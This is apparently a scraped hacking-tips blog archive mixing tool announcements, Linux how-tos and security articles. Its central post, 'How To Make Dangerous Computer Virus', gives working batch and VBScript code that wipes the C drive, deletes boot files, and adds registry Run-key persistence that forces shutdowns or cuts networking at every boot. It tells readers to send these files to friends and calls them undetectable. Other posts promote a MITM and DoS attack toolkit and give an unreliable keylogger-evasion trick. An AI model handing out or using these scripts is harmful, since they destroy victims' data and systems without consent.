free Hosting

Your Hashrate cex.io

Mining Bitcoin GHS cex.io

polisionline

cex.io

free bitcoin world

free bitcoin india

Translate

jangan lupa klik suka

Diberdayakan oleh Blogger.

statistics

HOME

Archive for 2014

Automated Android APK Unpacking

Performing static analysis on an Android application can get a bit tedious when having to use apktool and dex2jar to de-compile APK files. I wanted to automate the process in an easy way to assist people with this simple but time consuming task, especially for those who want to de-compile multiple apps using both dex2jar and apktool. 

The lightweight ruby gem was built to utilize dex2jar and apktool to de-compile and output the corresponding files to a specified directory.

You can download the latest gem from here:

http://adf.ly/lcWgZ

You can view the project page on git from here:

http://adf.ly/lcWtc

Dex2jar and apktool are not included within the gem in this version so those two tools will have to be installed separately. The path of apktool.jar, dj2-dex2jar.sh or .bat, the .apk files, and output location is required to be set in a YAML file. The syntax and example of the YAML file is below but can also be found in the /examples directory of the gem:

apk:
- /Users/somebody/Desktop/com.example.apk

- /Users/somebody/Desktop/com.another.example.apk

apktool: /Users/somebody/tmp/apktool1.5.2/apktool.jar

output_directory: /Users/somebody/Desktop/apk_stuff

d2j: /Users/somebody/tmp/dex2jar-0.0.9.15/d2j-dex2jar.sh

To run the gem you execute the following commands:

apk_unpack -c <path/to/YAML file>

There are a few things we will be working on for future releases. Including the possibility of having the YAML file point at a directory instead of specific APK files, offloading de-compiling the APK files to a service running on Heroku. This would all be automated to download the APK, decompile it and then serve it to the user.

We hope you have found this post to be helpful in performing Android assessments and as usual, we'd love to hear your thoughts.

[good tool for pentester] netool.sh V4.0 just released

netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip,
Metasploit and Ettercap MITM attacks. this script makes it easy, tasks such as
SNIFFING tcp/udp traffic, ManInTheMiddle attacks, SSLsniff, DNS spoofing, the other
modules available are:

retrieve metadata from target website, DoS attacks inside the external/local network,
also uses macchanger to decoy scans, uses nmap to search for a specified port open
in external/local lan, change/see your mac address, change my PC hostname, can also
perform TCP/UDP packets manipulation using etter.filters, also as the hability of
capture pictures of web-browser surfing on the target machine under MITM attack and
performs a vuln scan to the target web-site using websecurify firefox-addon, also
uses [msfpayload+msfencode+msfcli] to have remote control of target machine, also
came with [root3.rb] meterpreter ruby auxiliary script,and a module for install/edit
the meterpreter script and upgrade the metasploit database automatic, search for
targets geolocation, or use [webcrawler.py] module to search for admin login pages,
website directorys,webshells.php planted on website,common file upload vulns scanner
[LFI], and search for xss vuln websites using google dorks, also uses a module to
automated some attacks over MITM (dns-spoof+metasploit+phishing, and a colection of
(metasploit) automated exploits...

Download:
http://adf.ly/liX1L

Tutorial:
https://www.youtube.com/watch?v=_GD3A9U48v0

Ebury SSH Rookit/Backdoor Trojan

About 3 days ago, an Ubuntu user (aka Empire-Phoenix) shouted for help at Ubuntu Forums - Security Discussions that his server has been infected by Ebury SSH Rookit/Backdoor Trojan. In his case, his mail server IP address has been blacklisted due to the infection. His story is here. (https://adf.ly/liaC4)

CERT Bund has announced the details about this rootkit/backdoor and they also include the Snort rule for the detection. The link is here. (https://adf.ly/liaLN)

The only solution is to re-install the server(s).

However, the main question is how the intruder(s) compromise our server(s) and install the rootkit? Our server(s) is/are compromised via SSH or other vulnerabilities in the server(s)?

Even if we re-install our server(s) after the infection but leave the unknown factor(s) behind, our server(s) will be infected again. If we installed IDS, we will be notified about the infection but we also need to re-install the server(s) that in question.

I supposed that the server of the captioned Ubuntu user is up-to-date and he had nothing to do with this infection as his server is a production server and he also do not know what is the problem on his server before the infection. The defensive solution is to do penetration test on the server in a regular time and it may prevent this from happening.

Update

More news here. (https://adf.ly/liaUt)

Why You Should Learn Programming & Networking before learn hacking

When | Where | How | - can I learning Hacking ?

I've started this with the term 'Hacking' - If you're reading this then probably you want to become a Hacker. But do you really think it is so easy to become Hacker ?. Well let it be up to you, so what do i need to become Hacker ?

First of all you must have two things in your soul : Passion & Determination. This all isn't just a words but a power to change everything. If you've passion and determination you can do anything. Well in short You've to do little hard work with little sacrifices. Let's reinforce each question with easy answers and have a little chat.

When Can I Learn Hacking ? (Sounds Like : Eligibility to become Hacker)

Well, up till now even you've realized that becoming hacker isn't that much easy! it requires lots of experience and knowledge in Software, Networking, Programming, Web Application etc. Eligibility ? Did I used any wrong word ? Let it be, there's no age limit to learn Hacking. So what is the eligibility ?

You can start learning Hacking - When you've at least 50% to 60% knowledge in Software and Web Application Programming. The second most important thing you should know Networking - At least 60%.

Why everyone recommend to learn Programming first before Hacking ?

It's simple, tell me how Software, Web Apps are made ? - Programming Languages. Almost every technology runs on Programming Language. So if you want to break (Hack) software, You must know Programming Languages. Because You're going to Hack/Crack it - Simply if you don't know Programming - So how'll you understand how it is made ? How it is working ? What's its weakness point. These questions matters! a lot.

What about Networking ? They recommend Networking too!

Almost everywhere is network! - Softwares are moving on Cloud. Cloud based technology is evolving very fast. Every Web Applications runs on Network - TCP/IP and Servers. It's highly recommended you to learn and understand how those Protocols - and technology communicates with each others on Internet. How Computer Network, Servers, Client communicates with each others.

But From Where Can I Learn Programming/Networking & Hacking ?

If you're asking from where ? well even a small kid will laugh on you. Okay! There're so many resources, sites, wiki, blogs, white/black hat videos, tutorials, forums etc to learn almost everything. If you can't understand - ask for help in learning, explaining or Join any Programming/Hacking/Networking coaching. But there's no need to waste money! just with little effort you can learn in free at your home. Even we share plenty of articles, Tutorials. Join Forums, Get connected to Blogs, read Wiki's, Google each and every query you get into your mind. Read White Papers, Learn Programming from millions of sites - Search on Google. For Networking do same.

Okay Now the final & Most Important query -  How can i learn Hacking ?

This question doesn't make sense, How Can I Learn Hacking. If you're good in Programming and Networking - You can start learning Hacking. It'll be easy and understandable for you. Programming - Networking - Hacking.

We've discussed and answered some important questions, but what is the main thing in this Process ? - Whether you've Passion and Determination or Not. See even i'm learner, I understand how it feels. But never ever give-up! Be confident, Passionate, Inspired and Determined on your task.

Something About Virus!!!

What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.

Types of viruses :- 
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

How To Make Dangerous Computer Virus ? 10 Most Famous Computer Viruses Codes

Today i tell you how to make simple yet very powerful or you can say Harmful computer virus using a batch file.No software is required to make this Dangerous Computer virus, Notepad is enough for it. The good thing about this virus that is not detected by any AntiVirus.Therefor you can easly make this and use it any computer.You will create this virus using batch file programming. This virus will Delete the C Drive completely.
Lets Start.

1. Open Notepad ( Go to start > click on run > write notepad )
2. Now Copy below code in notepad

@Echo off
Del C:\ *.* |y

3. S
ave this file as Virus.bat

4. N
ow, running this file will delete all the content of C Drive.


Some New Viruses Codes


0.Convey your friend a little message and shut down his / her computer:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it. 

1.Toggle your friend's Caps Lock button simultaneously:

Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 

2.Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

3.This Virus Deletes All The Content Of C Drive... 

@echo off
del %systemdrive%*.* /f /s /q 
shutdown -r -f -t 00 
Save The Above Code As Anything.bat 


4.This Will Crash your Computer 
Option Explicit
 
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell") 
 
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs 
  

5.The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off 
Del C: *.* |y 
 Save It As Anything.bat 

6.Virus that crashes pc

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
 

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


7.Shutdowns Computer Everytime It Is Turned On


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


8.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save As Anything.bat

  
9.Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


10.System Meltdown


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
 PAUSE
PAUSE


Save As Anything.bat



11.Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit
Note:

Please don't try to run on your own computer. it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer

How to set up a web-based lightweight system monitor on Linux

Sometimes we, as a normal user or a system admin, need to know how well our system is running. Many questions related to system status can be answered by checking log files generated by active services. However, inspecting every bit of log files is not easy even for seasoned system admins. That is why they rely on monitoring software which is capable of gathering information from different sources, and reporting analysis result in easy to understand formats, such as graphs, visualization, statistics, etc.
There are many sophisticated monitoring system software such as CactiNagios, Zabbix, Munin, etc. In this article, we pick a lightweight monitoring tool called Monitorix, which is designed to monitor system resources and many well-known third-party applications on Linux/BSD servers. Optimized to run on resource-limited embedded systems, Monitorix boasts of simplicity and small memory footprint. It comes with a built-in HTTP server for web-based interface, and stores time series statistics with RRDtool which is easy to combine with any scripting language such as Perl, Python, shell script, Ruby, etc.

Main Features

Here is a list of Monitorix's main features. For a complete list, refer to the official site.
  • System load and system service demand
  • CPU/GPU temperature sensors
  • Disk temperature and health
  • Network/port traffic and netstat statistics
  • Mail statistics
  • Web server statistics (Apache, Nginx, Lighttpd)
  • MySQL load and statistics
  • Squid proxy statistics
  • NFS server/client statistics
  • Raspberry Pi sensor statistics
  • Memcached statistics

Install and Configure Monitorix on Fedora, CentOS or RHEL

First, install required packages as follows. Note that on CentOS, you need to set up EPEL and Repoforge repositories first.
$ sudo yum install rrdtool rrdtool-perl perl-libwww-perl perl-MailTools perl-MIME-Lite perl-CGI perl-DBI perl-XML-Simple perl-Config-General perl-HTTP-Server-Simple perl-IO-Socket-SSL
After this, Monitorix can be installed with this command:
$ sudo yum install monitorix
To configure Monitorix, open the configuration file in /etc/monitorix/monitorix.conf, and change the options. The details on Monitorix configuration file can be found at http://www.monitorix.org/documentation.html
By default, the built-in HTTP server listens on port 8080. Thus, make sure that your firewall does not block TCP port 8080.
To start Monitorix, simply type the following.
$ sudo service monitorix start
Start your favorite web browser, and then go to http://<host-ip-address>:8080/monitorix to access Monitorix's web interface.

Install and Configure Monitorix on Archlinux

On Archlinux, the Monitorix package can be downloaded from AUR.
By default, the built-in HTTP server is disabled on Archlinux. To enable built-in HTTP server, edit <httpd_builtin> section in /etc/monitorix.conf as follows.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<httpd_builtin>
        enabled = y
        host =
        port = 8080
        user = nobody
        group = nobody
        log_file = /var/log/monitorix-httpd
        hosts_deny =
        hosts_allow =
        <auth>
                enabled = n
                msg = Monitorix: Restricted access
                htpasswd = /var/lib/monitorix/htpasswd
        /auth>
/httpd_builtin>
Finally, start Monitorix service.
Open your favorite web browser, and go to http://<host-ip-address>:8080/monitorix to access Monitorix.

Install and Configure Monitorix on Debian and Ubuntu

For Debian family, Monitorix can be installed in two ways: manually or through a third party repository.

Manual installation (for Debian)

Install all dependent packages first.
$ sudo apt-get install rrdtool perl libwww-perl libmailtools-perl libmime-lite-perl librrds-perl libdbi-perl libxml-simple-perl libhttp-server-simple-perl libconfig-general-perl libio-socket-ssl-perl
Download Monitorix package from http://www.monitorix.org/downloads.html, and install it.
$ sudo dpkg -i monitorix*.deb
During installation, you might be asked to configure a backend web server. If you using Apache, make sure to reload Apache configuration by restarting Apache service.
$ sudo service apache2 reload

Installation through repositories (for Ubuntu)

Enable Izzysoft repository by appending the following line in /etc/apt/source.list.
deb http://apt.izzysoft.de/ubuntu generic universe
Download and add a GPG key for the repository.
$ wget http://apt.izzysoft.de/izzysoft.asc
$ sudo apt-key add izzysoft.asc
Install Monitorix with apt-get. All its dependent packages will automatically be installed as well.
$ sudo apt-get update
$ sudo apt-get install monitorix
Finally, start Monitorix service.
$ sudo service monitorix start
To configure Monitorix, edit /etc/monitorix/monitorix.conf with a text editor, and restart Monitorix service.
$ sudo service monitorix restart
The built-in web server of Monitorix for Ubuntu is enabled by default. To access web-based monitoring result, go to http://<host-ip-address>8080/monitorix on your favorite web browser.

Install and Configure Monitorix on Raspberry Pi

If you want to install Monitorix on Raspberry Pi (which is Debian-based), you cannot use the Izzysoft repository mentioned above because it does not provide an ARM port of Monitorix. Instead, follow Debian-based manual installation as follows.
First, install required packages.
$ sudo apt-get install rrdtool perl libwww-perl libmailtools-perl libmime-lite-perl librrds-perl libdbi-perl libxml-simple-perl libhttp-server-simple-perl libconfig-general-perl libio-socket-ssl-perl
If some of the required packages are not be installed, we need to force install with this command.
$ sudo apt-get -f install
Download Monitorix package (monitorix_x.x.x-izzy1_all.deb) from http://www.monitorix.org/downloads.html.
Install Monitorix package with the command below.
$ sudo dpkg -i monitorix_x.x.x-izzy1_all.deb
After installation is finished, we need to change a small thing in Monitorix configuration as follows.
Open /etc/monitorix/monitorix.conf with your favorite text editor. Scroll down until you find <graphs enable>. Search for "raspberrypi = n", and replace 'n' with 'y'. This will enable monitoring of Raspberry Pi clock frequency, temperatures and voltages.
After editing is done, restart Monitorix service.
$ sudo service monitorix restart
By default, Monitorix's built-in HTTP web server is enabled. To access Monitorix's web interface, go to http://<raspberrypi-ip-address>:8080/monitorix

Monitorix Screenshots (on Raspberry Pi)

System load average and usage in graph option:
Active process graph option:
Choose "Clock Frequency" under "Raspberry Pi" section in the home screen, and you will see clock frequency, temperature, and voltage graphs for Raspberry Pi.
All monitoring graphs:

Android Sqlmap Gui Alpha

Its a very very very simple Gui No extra No Support just a Open Source Alpha Dirty coding skill.
What you need to run Sqlmap on Android is.
* Android with ROOT Permissions !!!
https://play.google.com/store/apps/details?id=org.torproject.android “Only if you want to tunnel Traffic over Tor network” Disable Java Script on Default Browser or Tor is unless !!!

1.Install Botbrew Basil and Start it.
Install Botbrew default on your system not sd-ext cache oder other.
Install “command line Extra”
Install “apt-get”
Install “python”.
Close Botbrew Basil Now.
2.Install Android Terminal Emulator and start it and close it.
3.Install Android Sqlmap Gui Download from here http://flexydrive.com/ywg97j1rf5sq
4.Start Android Sqlmap Enter Some Target.

Command to copy/clone user profile to root.



Code: [Select]
sudo cp -r /home/user/* /root
sudo cp -r /home/user/.[^.]* /root
This will copy over all of your profile settings such as user skins, Windows themes, icons…etc Great for OS’s like Voyager & Backbox to make the root account visually the same as the un privileged user.

How to build Python application for Android / iOS and Desktop



I’ll just present you Buildozer. With this tool, you will be able to build your Python projects to Android, iOS, Windows, OSX and/or Linux.

If you prefer and if you are going to develop for Android with Python, you can just download the Kivy VM for Android. Take a look in this post and see what do you need to use it.

Currently, Buildozer supports packaging for:

Android: via Python for Android. You must have a Linux or OSX computer to be able to compile for Android.
iOS: via Kivy iOS. You must have an OSX computer to be able to compile for iOS.
Supporting others platform is in the roadmap (such as .exe for Windows, .dmg for OSX, etc.)
This tool is currently in alpha, so it can has some bugs.



I – Install

i – Using PIP

If you have PIP installed, just run the command bellow to install it:

pip install --upgrade buildozer
ii – Using easy_install

easy_install buildozer
iii – Building it from source

If you prefer, you can build Buildozer from source. Just run the following commands to try it:

git clone git://github.com/kivy/buildozer
cd buildozer
python2.7 setup.py install


If you will be developing for Android, you will need at least Cython, few build libs and Java SDK. Some binaries of the Android SDK are still in 32 bits, so you need few 32bits libraries available:

pip install --upgrade cython #use pip or other tool to install cython
apt-get install ccache lib32stdc++6 openjdk-7-jdk #if you are using Debian-like OS
II – Using it



Buildozer is very well documented, so I’m not going to show you how to use it here, just read the documentation: https://github.com/kivy/buildozer#usage-example

You can read this docs too: http://buildozer.readthedocs.org/en/latest/quickstart.html

Now, you are able develop apps/games for any platform with Python!

Fool keylogger and protect yourself from hackers


when you surf net at public computers or net cafes…maybe it can be even at your friends house..etc.. there is a danger that a possible key logger software can steal your password, so i have come up with a simple and effective way to counter it…at least 50% …

lets see how simply you can fool a key logger,When you choose passwords try using simple, capital & numbers as a combination..

when you enter them in a public computer rather than entering it in sequence try entering it in a combination

for this trick suppose my password is - hi2K1987 [DEMO password]

Now when you break your password into 3 combinations and enter them one after another (without using the backspace key) so what i did was i entered 2k first then using the mouse i went to the start of the password field and entered hi then i placed the cursor at the end and entered 1987 now simply the key logger is fooled.

he will read mah password as: delghi2k1987(fooled)
Now imagine if you use a set of numbers for your password and you enter them in a combination…

so, guys next time you enter your password you know you are safe, jst a simple trick so u can use ur own imagination..

CMD Fun Tricks and Useful CMD Commands



(1)If you are using a guest account and run is disabled you can use notepad to open regedit and cmd'
open notepad and type command.com and save it as cmd.bat this batch file will open command prompt.
if you cant open regedit by run open notepad type regedit and save it as regedit.bat double click on this and regedit window will open.
(2)use notepad to abort shutdown -Open notepad and type shutdown -a and save it as shutdown.bat.next time when your computer is about to shutdown double click on this bat file. for other cmd commands open command prompt and type shutdown a and press enter.
(3)cmd fun virus- open notepad and type shutdown -r 10 and save as restart.bat this will restart your computer in 10 seconds if you want to use this for fun paste this file in system 32 and see. computer will restart in every 10 second.
(4)IP command- open command prompt and type ipconfig/all .
(5)How to know your friend's ip when chatting on a messenger. suppose you are using g-talk. ask your friend for a good wallpaper you have downloaded. send this to him .Now open your cmd and type Netstat -n

32-bit or 64-bit, What to choose and Why?



The tendency of a computer’s processor to deal with information on RAM (random access memory) depends upon 32 bit and 64 bit version of Windows. 64 bit version can handle more RAM and apps than 32 bit.
Let’s understand it in a simple way. 64 bit version can deal with physical memory (RAM) above 4 GB and up to 128GB (yes, it exists!) while 32-bit version ...
can address RAM up to 4 GB only. Therefore, if you have a 32 bit version of Windows installed on your computer then installing RAM above 4 GB doesn’t make sense.
The ability to handle large memory makes the 64 bit version more efficient while dealing with processes. Hence, it increases the overall performance of your PC. So 64 bit is more powerful in a nutshell. Now lets check some more things related to these two technologies.

Advantages of 64 bit computer--
?The main advantage of using 64-bit version of Windows is that it offers better memory accessibility and management.
?Enhanced security features like Kernel p@tch Protection, support for hardware-backed data execution protection, mandatory driver signing, removal of support for 32-bit drivers and removal of the 16-bit subsystem available.
?Performance of those programs that are specially written for 64 bit operating system is great.

Disadvantages of 64 bit computer--
There is no specific disadvantage of using this version but there are some things you have to take care of before deciding to use it.
?You should check availability of device drivers because 32 bit device drivers do not work on 64 bit version.
?Most of the hardware devices are not compatible with 64-bit computer.
?Device drivers must be digitally signed by the developer.
?Some programs of 32 bit aren’t compatible with 64 bit.

[How to Choose a correct version of Windows]

64 bit version--
?Selecting correct version of Windows depends upon your priority and need. If you want to take advantage of large memory (more than 4 GB) then you could go for 64-bit version. But do check for the 64-bit versions of various tools and programs you use everyday before making the switch.
?Most of new software and hardware are supported by 64-bit version. Check compatibility status of your software and devices.

32 bit version--
?32 bit versions are cheaper than 64 bit versions.
?If you are using old software and hardware then you could go with 32-bit version because it can support all your program and devices.

Note: Most programs designed for 32 bit version can support 64-bit version too (except some antivirus programs). But if a program is designed for 64 bit version then it won’t work on 32 bit version.

Anti Sniffer Tools List To Protect You From Sniffing Attacks



As we known spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage.
So today we are posting some Antisniffer tools to protect you from sniffing attacks.

1. Trafscrambler:

It is an anti-sniffer/IDS LKM(Network Kernel Extension) for OSX 
SYN decoy - sends out number of SYN pkts before the original SYN pkt
TCP reset attack - sends out RST/FIN pkt with bad sequence
Pre-connection SYN - sends out SYN with wrong TCP-checksum
Post-connection SYN - sends out fake SYN after connection establishment
Zero Window - send out pkt with “0” window set
Injection of packets with bogus data and with randomly selected bad TCP cksum or bad TCP sequences
Userland binary(tsctrl) for controlling trafscrambler NKE
Plugged an mbuf leak

Download: http://flexydrive.com/dtwfr34d2okx

2. Sniff joke:
SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifying and inject fake packets inside your transmission, make them almost impossible to be correctly read by a passive wiretapping technology (IDS or sniffer).

Download : http://flexydrive.com/um1ah9jd01m9

3. Kitty-Litter
Its a small size tool and configured and installed by all types of userrs. This tool is protect from data leakage from the websites and online accounts.

Download: http://flexydrive.com/gaqihvcktjun

- Copyright © test - - dirancang oleh rmohammadhakimzakaria -